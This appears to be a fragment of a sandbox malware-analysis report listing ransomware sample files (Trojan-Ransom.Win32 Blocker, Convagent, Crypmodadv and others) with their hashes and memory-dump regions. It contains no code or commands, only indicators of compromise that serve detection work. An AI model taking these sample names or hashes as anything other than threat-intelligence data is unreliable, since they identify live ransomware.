| SHA512 | f5d6d744ab7ad3884389e7b26848a2d0c7d5cdf212c8168834b7d9f0aa1e31995f640e22f743b2c53e268b1855f8321861b022675d72497298fb6fa1907a96b7 |
\??\c:\users\admin\desktop\00462\heur-trojan-ransom.win32.blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
| MD5 | cbacfede45047ab3bf3126c87d584365 |
| SHA1 | 06a4e1bb7e881cefdd9a40eb1b20bd6ec7eaf6ca |
| SHA256 | ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20 |
| SHA512 | 07b93dcb65c7722c9615bee976a877d84507bd1d065387ce5d5f7b9811062bc77701b655cf2235a6cb5c23378e2975a4a0f640886ff8a473333644460b77b7c5 |
memory/3696-158-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
| MD5 | 29588955e6a92e7735ef3b709af80f80 |
| SHA1 | 275399445c81912394a9db3bdd39c9a1e45cad1c |
| SHA256 | 068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21 |
| SHA512 | 6af1ac3ecb95e8255edbd292b0d6086d6b35ee4cad523ef5e44d565567b1512f27c0adee7048bc7769df3e297154fcce8d17f35364995ab3f1f26564d492a84a |
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
| MD5 | 8513f15ba5b3d505e77685114cc8dc08 |
| SHA1 | c8cbe6c7964f64aa499abe596e467ccb5e7102d7 |
| SHA256 | bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939 |
| SHA512 | 026c099a938e3ebd645be5f84e36225785798648a7bbd74fbc0a47cef29f0165e1fd9c30640c368748be4ae870ad4fabba33c9582f52c5f3025ffc25ec6799d4 |
memory/2260-164-0x0000000000400000-0x00000000005BB000-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
| MD5 | 2608f964ac5cd53d7707fe5c04371250 |
| SHA1 | 35e70686ec6d97171ae226a904fe612c91c5b698 |
| SHA256 | ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14 |
| SHA512 | 16e16c943076fa76ffb3552ccb574da907d37e61a2f3ed33dcf0341c95c0c29130d82cdf31d2640fa50eed714d723ad4792d0f579616033c27e811d9c5bc1da8 |
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
| MD5 | 47e5edda93a308df1efa3827ec5793f4 |
| SHA1 | 65ec29a2e1b59babd58cfdccde5dcb70e4cf3003 |